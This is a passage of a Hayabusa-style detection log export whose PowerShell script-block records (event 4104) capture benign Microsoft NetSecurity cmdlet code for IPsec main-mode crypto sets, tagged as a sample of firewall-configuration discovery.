$__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.Paramete",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.989 
+00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"rSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { 
$__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecMainModeCryptoSet' function Rename-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, 
[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not 
$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 
'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; 
ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecMainModeCryptoSet' function Copy-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardc",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.989 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"imv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, 
[Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] 
[Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values 
= @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if 
($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 